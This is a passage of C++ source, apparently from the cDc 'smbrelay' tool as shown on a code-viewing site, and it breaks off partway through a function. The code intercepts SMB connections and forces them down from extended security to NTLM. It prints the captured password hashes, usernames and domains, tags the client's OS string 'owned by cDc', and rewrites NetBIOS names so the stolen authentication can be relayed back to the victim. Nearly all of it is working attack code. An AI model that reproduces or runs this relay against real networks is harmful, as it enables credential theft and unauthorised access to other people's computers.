📄 smbrelay.cpp
字号:
sprintf((char *)&UncompressedName[(x*2)+1], "%02X", (DWORD)Name[x] );
// add 'A' to each char
for (x = 1; x <= 32; x++)
{
char *ptr;
hexbuf[0] = UncompressedName[x];
hexbuf[1] = 0;
UncompressedName[x] = 'A' + (BYTE)strtoul(hexbuf, &ptr, 16);;
}
UncompressedName[33] = 0;
#ifdef USE_SCOPEID
// add SCOPE_ID
UncompressedName[33] = 7;
memcpy((char *)&UncompressedName[34], "NETBIOS", 7);
UncompressedName[41] = 3;
memcpy((char *)&UncompressedName[42], "COM", 3);
#endif
// set the length
x = 34;
memcpy(dest, UncompressedName, x);
return x;
}
void PrintHexString(BYTE *src, int len)
{
int x;
if (len == 0)
return;
for (x = 0; x < len; x++)
{
printf("%02X", *src);
src++;
}
printf(" ");
}
const char *GetCommandType(BYTE Command)
{
static char retbuff[64];
char * ret = retbuff;
switch(Command)
{
case SMB_COM_CREATE_DIRECTORY:
ret = "SMB_COM_CREATE_DIRECTORY";
break;
case SMB_COM_DELETE_DIRECTORY:
ret = "SMB_COM_DELETE_DIRECTORY";
break;
case SMB_COM_OPEN:
ret = "SMB_COM_OPEN";
break;
case SMB_COM_CREATE:
ret = "SMB_COM_CREATE";
break;
case SMB_COM_CLOSE:
ret = "SMB_COM_CLOSE";
break;
case SMB_COM_FLUSH:
ret = "SMB_COM_FLUSH";
break;
case SMB_COM_DELETE:
ret = "SMB_COM_DELETE";
break;
case SMB_COM_RENAME:
ret = "SMB_COM_RENAME";
break;
case SMB_COM_QUERY_INFORMATION:
ret = "SMB_COM_QUERY_INFORMATION";
break;
case SMB_COM_SET_INFORMATION:
ret = "SMB_COM_SET_INFORMATION";
break;
case SMB_COM_READ:
ret = "SMB_COM_READ";
break;
case SMB_COM_WRITE:
ret = "SMB_COM_WRITE";
break;
case SMB_COM_LOCK_BYTE_RANGE:
ret = "SMB_COM_LOCK_BYTE_RANGE";
break;
case SMB_COM_UNLOCK_BYTE_RANGE:
ret = "SMB_COM_UNLOCK_BYTE_RANGE";
break;
case SMB_COM_CREATE_TEMPORARY:
ret = "SMB_COM_CREATE_TEMPORARY";
break;
case SMB_COM_CREATE_NEW:
ret = "SMB_COM_CREATE_NEW";
break;
case SMB_COM_CHECK_DIRECTORY:
ret = "SMB_COM_CHECK_DIRECTORY";
break;
case SMB_COM_PROCESS_EXIT:
ret = "SMB_COM_PROCESS_EXIT";
break;
case SMB_COM_SEEK:
ret = "SMB_COM_SEEK";
break;
case SMB_COM_LOCK_AND_READ:
ret = "SMB_COM_LOCK_AND_READ";
break;
case SMB_COM_WRITE_AND_UNLOCK:
ret = "SMB_COM_WRITE_AND_UNLOCK";
break;
case SMB_COM_READ_RAW:
ret = "SMB_COM_READ_RAW";
break;
case SMB_COM_READ_MPX:
ret = "SMB_COM_READ_MPX";
break;
case SMB_COM_READ_MPX_SECONDARY:
ret = "SMB_COM_READ_MPX_SECONDARY";
break;
case SMB_COM_WRITE_RAW:
ret = "SMB_COM_WRITE_RAW";
break;
case SMB_COM_WRITE_MPX:
ret = "SMB_COM_WRITE_MPX";
break;
case SMB_COM_WRITE_COMPLETE:
ret = "SMB_COM_WRITE_COMPLETE";
break;
case SMB_COM_SET_INFORMATION2:
ret = "SMB_COM_SET_INFORMATION2";
break;
case SMB_COM_QUERY_INFORMATION2:
ret = "SMB_COM_QUERY_INFORMATION2";
break;
case SMB_COM_LOCKING_ANDX:
ret = "SMB_COM_LOCKING_ANDX";
break;
case SMB_COM_TRANSACTION:
ret = "SMB_COM_TRANSACTION";
break;
case SMB_COM_TRANSACTION_SECONDARY:
ret = "SMB_COM_TRANSACTION_SECONDARY";
break;
case SMB_COM_IOCTL:
ret = "SMB_COM_IOCTL";
break;
case SMB_COM_IOCTL_SECONDARY:
ret = "SMB_COM_IOCTL_SECONDARY";
break;
case SMB_COM_COPY:
ret = "SMB_COM_COPY";
break;
case SMB_COM_MOVE:
ret = "SMB_COM_MOVE";
break;
case SMB_COM_ECHO:
ret = "SMB_COM_ECHO";
break;
case SMB_COM_WRITE_AND_CLOSE:
ret = "SMB_COM_WRITE_AND_CLOSE";
break;
case SMB_COM_OPEN_ANDX:
ret = "SMB_COM_OPEN_ANDX";
break;
case SMB_COM_READ_ANDX:
ret = "SMB_COM_READ_ANDX";
break;
case SMB_COM_WRITE_ANDX:
ret = "SMB_COM_WRITE_ANDX";
break;
case SMB_COM_CLOSE_AND_TREE_DISC:
ret = "SMB_COM_CLOSE_AND_TREE_DISC";
break;
case SMB_COM_TRANSACTION2:
ret = "SMB_COM_TRANSACTION2";
break;
case SMB_COM_TRANSACTION2_SECONDARY:
ret = "SMB_COM_TRANSACTION2_SECONDARY";
break;
case SMB_COM_FIND_CLOSE2:
ret = "SMB_COM_FIND_CLOSE2";
break;
case SMB_COM_FIND_NOTIFY_CLOSE:
ret = "SMB_COM_FIND_NOTIFY_CLOSE";
break;
case SMB_COM_TREE_CONNECT:
ret = "SMB_COM_TREE_CONNECT";
break;
case SMB_COM_TREE_DISCONNECT:
ret = "SMB_COM_TREE_DISCONNECT";
break;
case SMB_COM_NEGOTIATE:
ret = "SMB_COM_NEGOTIATE";
break;
case SMB_COM_SESSION_SETUP_ANDX:
ret = "SMB_COM_SESSION_SETUP_ANDX";
break;
case SMB_COM_LOGOFF_ANDX:
ret = "SMB_COM_LOGOFF_ANDX";
break;
case SMB_COM_TREE_CONNECT_ANDX:
ret = "SMB_COM_TREE_CONNECT_ANDX";
break;
case SMB_COM_QUERY_INFORMATION_DISK:
ret = "SMB_COM_QUERY_INFORMATION_DISK";
break;
case SMB_COM_SEARCH:
ret = "SMB_COM_SEARCH";
break;
case SMB_COM_FIND:
ret = "SMB_COM_FIND";
break;
case SMB_COM_FIND_UNIQUE:
ret = "SMB_COM_FIND_UNIQUE";
break;
case SMB_COM_NT_TRANSACT:
ret = "SMB_COM_NT_TRANSACT";
break;
case SMB_COM_NT_TRANSACT_SECONDARY:
ret = "SMB_COM_NT_TRANSACT_SECONDARY";
break;
case SMB_COM_NT_CREATE_ANDX:
ret = "SMB_COM_NT_CREATE_ANDX";
break;
case SMB_COM_NT_CANCEL:
ret = "SMB_COM_NT_CANCEL";
break;
case SMB_COM_OPEN_PRINT_FILE:
ret = "SMB_COM_OPEN_PRINT_FILE";
break;
case SMB_COM_WRITE_PRINT_FILE:
ret = "SMB_COM_WRITE_PRINT_FILE";
break;
case SMB_COM_CLOSE_PRINT_FILE:
ret = "SMB_COM_CLOSE_PRINT_FILE";
break;
case SMB_COM_GET_PRINT_QUEUE:
ret = "SMB_COM_GET_PRINT_QUEUE";
break;
default:
sprintf(retbuff, "Command 0x%02X", Command);
break;
}
return ret;
}
const char *GetMessageType(BYTE Type)
{
char *typeptr = "Unknown";
switch (Type)
{
case TYPE_SESSION_MESSAGE:
typeptr = "Session Message";
break;
case TYPE_SESSION_REQUEST:
typeptr = "Session Request";
break;
case TYPE_POSITIVE_SESSION_RESPONSE:
typeptr = "Positive Session Response";
break;
case TYPE_NEGATIVE_SESSION_RESPONSE:
typeptr = "Negative Session Response";
break;
case TYPE_RETARGET_SESSION_RESPONSE:
typeptr = "Retarget Session Response";
break;
case TYPE_SESSION_KEEP_ALIVE:
typeptr = "Session Keep Alive";
break;
}
return typeptr;
}
void mainconnectionhandler(void *arg)
{
SOCKET outsock, inconsock ;
SOCKADDR_IN sockaddr, sourcesockaddr;
char buff[65536];
char namebuff[64];
BYTE challenge[8];
BYTE caseinsensitivepassword[24];
BYTE casesensitivepassword[24];
char username[64];
char hostname[64];
DWORD SessionID;
PNEWCONINFO pnewconinfo = (PNEWCONINFO)arg;
char negotiateheaders[1024];
char logonandconnectheaders[1024];
WORD UID;
int hostnumber = pnewconinfo->hostcount;
inconsock = pnewconinfo->connectionsock;
memcpy(&sockaddr, &pnewconinfo->sourcesockaddr, sizeof(SOCKADDR_IN));
memcpy(&sourcesockaddr, &pnewconinfo->sourcesockaddr, sizeof(SOCKADDR_IN));
outsock = socket(AF_INET, SOCK_STREAM, 0);
sockaddr.sin_port = htons(139);
if (connect(outsock, (LPSOCKADDR)&sockaddr, sizeof(sockaddr)) == SOCKET_ERROR)
{
printf("Unable to connect to %s:%d\n", inet_ntoa(sockaddr.sin_addr), 139);
return;
}
DWORD l = 0;
ioctlsocket(inconsock, FIONBIO , &l);
PNBSESSIONHEADER pnbsessionheader = (PNBSESSIONHEADER)buff;
PSMBHEADER psmbheader = (PSMBHEADER)(pnbsessionheader + 1);
PSMBDIALECTSELECTHEADER pdialectselectheader = (PSMBDIALECTSELECTHEADER)(psmbheader+1);
PSESSION_SETUP_ANDHEADER psessionsetupand = (PSESSION_SETUP_ANDHEADER)(psmbheader+1);
PSESSION_SETUP_ANDHEADER2 psessionsetupand2 = (PSESSION_SETUP_ANDHEADER2)(psmbheader+1);
PSESSION_SETUP_ANDHEADER2EX psessionsetupand2ex = ( PSESSION_SETUP_ANDHEADER2EX)(psmbheader+1);
PSESSION_SETUP_ANDRESPONSEHEADER psessionsetupandresponse = (PSESSION_SETUP_ANDRESPONSEHEADER)(psmbheader + 1);
PTREE_CONNECT_ANDHEADER ptreeconnectand = (PTREE_CONNECT_ANDHEADER)(psmbheader+1);
BOOL bConnected = FALSE;
BOOL bContinue = TRUE;
int x = 0;
while (bContinue && !bConnected && !g_bQuit)
{
x = recv(inconsock, buff, sizeof(buff), 0);
if (x < 1)
{
printf("Error receiving data from incoming connection\n");
return;
}
printf("Request type: %s %d bytes\n", GetMessageType(pnbsessionheader->Type), x);
switch (pnbsessionheader->Type)
{
case TYPE_SESSION_REQUEST:
NetBIOSNameToString(namebuff, (BYTE *)buff + 38, x - 38);
printf("Source name: ");
PrintNetBIOSName((BYTE *)namebuff);
memcpy(hostname, namebuff, 15);
hostname[15] = 0;
{
char *ptr = &hostname[14];
while (*ptr == ' ')
{
*ptr = 0;
ptr--;
}
}
NetBIOSNameToString(namebuff, (BYTE *)buff + 4, x - 4);
printf("\nTarget name: ");
PrintNetBIOSName((BYTE *)namebuff);
printf("\nSetting target name to source name and source name to '%s'...\n", g_SourceName);
// could also fill in *SMBSERVER here
// copy source name to target name
memcpy(buff + 4, buff + 38, 34);
// change service value to server (0x20)
memcpy(buff + 35, "CA", 2);
// convert name string to netbios name format
StringToNetBIOSName(namebuff, g_SourceName, 20);
// copy our source name to packet
memcpy(buff + 38, namebuff, 34);
break;
case TYPE_SESSION_MESSAGE:
if (psmbheader->MagicVal == SMBMAGICVAL)
{
printf("%s\n", GetCommandType(psmbheader->Command) );
// Downgrade security yo NTLM
psmbheader->bExtendedSecurity = FALSE;
psmbheader->bNTErrorCodes = FALSE;
// psmbheader->bUnicodeStrings = FALSE;
psmbheader->bFlags2IsLongName = FALSE;
switch (psmbheader->Command)
{
case SMB_COM_NEGOTIATE:
// set to NT style connection (no extended security)
psmbheader->bUnicodeStrings = FALSE;
psmbheader->bNTErrorCodes = FALSE;
psmbheader->bUnknown1 = FALSE;
psmbheader->bUnknown2 = FALSE;
psmbheader->bUnknown3 = FALSE;
psmbheader->bUnknown4 = FALSE;
psmbheader->bUnknown5 = FALSE;
psmbheader->bUnknown6 = FALSE;
psmbheader->bUnknown7 = FALSE;
psmbheader->bUnknown8 = FALSE;
psmbheader->bExtendedSecurity = FALSE;
break;
case SMB_COM_SESSION_SETUP_ANDX:
switch (psessionsetupand->Len)
{
case SESSION_SETUP_ANDHEADER_LEN: // 9x?
printf("Password length: %d\n", psessionsetupand->PasswordLen );
if (psessionsetupand->PasswordLen > 1)
{
printf("Password: ");
PrintHexString((BYTE *)(psessionsetupand + 1), psessionsetupand->PasswordLen );
puts("");
bContinue = FALSE;
// bConnected = FALSE;
}
break;
case SESSION_SETUP_ANDHEADER2_LEN: // NT 4
printf("Password lengths: %d %d\n", psessionsetupand2->CaseInsensitivePasswordLen, psessionsetupand2->CaseSensitivePasswordLen );
if (psessionsetupand2->CaseInsensitivePasswordLen > 1)
{
printf("Case insensitive password: ");
PrintHexString((BYTE *)(psessionsetupand2 + 1), psessionsetupand2->CaseInsensitivePasswordLen );
puts("");
memcpy(caseinsensitivepassword, psessionsetupand2 + 1, 24);
}
if (psessionsetupand2->CaseSensitivePasswordLen > 1)
{
printf("Case sensitive password: ");
PrintHexString((BYTE *)(psessionsetupand2 + 1) + psessionsetupand2->CaseInsensitivePasswordLen, psessionsetupand2->CaseSensitivePasswordLen );
puts("");
memcpy(casesensitivepassword, (BYTE *)(psessionsetupand2 + 1) + psessionsetupand2->CaseInsensitivePasswordLen, 24);
}
if (/* psmbheader->bUnicodeStrings */TRUE)
{
WCHAR *ptr = (WCHAR *)(psessionsetupand2 + 1);
ptr = (WCHAR *)((char *)ptr + psessionsetupand2->CaseInsensitivePasswordLen + psessionsetupand2->CaseSensitivePasswordLen + 1);
printf("Username: \"%S\"\n", ptr);
sprintf(username, "%S", ptr);
ptr += wcslen(ptr) + 1;
printf("Domain: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
printf("OS: \"%S\"\n", ptr);
#if 1
_snwprintf(ptr, wcslen(ptr) , L"0wned by cDc ");
#endif
ptr += wcslen(ptr) + 1;
printf("Lanman type: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
printf("???: \"%S\"\n", ptr);
ptr += wcslen(ptr) + 1;
}
else
{
char *ptr = (char *)(psessionsetupand2 + 1);
ptr += psessionsetupand2->CaseInsensitivePasswordLen + psessionsetupand2->CaseSensitivePasswordLen + 1;
printf("Username: \"%s\"\n", ptr);
strncpy(username, ptr, sizeof(username));
ptr += strlen(ptr) + 1;
printf("Domain: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
printf("OS: \"%s\"\n", ptr);
ptr += strlen(ptr) + 1;
printf("Lanman type: \"%s\"\n", ptr);
}
if (psessionsetupand2->AndXCommand == SMB_COM_TREE_CONNECT_ANDX)
{
// add TREE_CONNECT_AND portion to connect to IPC$
psessionsetupand2->AndXOffset = sizeof(SMBHEADER) + psessionsetupand2->Len * 2 + psessionsetupand2->ByteCount + 3;
PTREE_CONNECT_ANDHEADER pTreeConnectAnd2 = (PTREE_CONNECT_ANDHEADER)(PTREE_CONNECT_ANDRESPONSEHEADER)( (char *)psmbheader + psessionsetupand2->AndXOffset );
pTreeConnectAnd2->Len = TREE_CONNECT_ANDHEADER_LEN;
pTreeConnectAnd2->AndXCommand = SMB_NONE;
pTreeConnectAnd2->AndXOffset = 0;
pTreeConnectAnd2->AndXReserved = 0;
pTreeConnectAnd2->Flags = 0;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -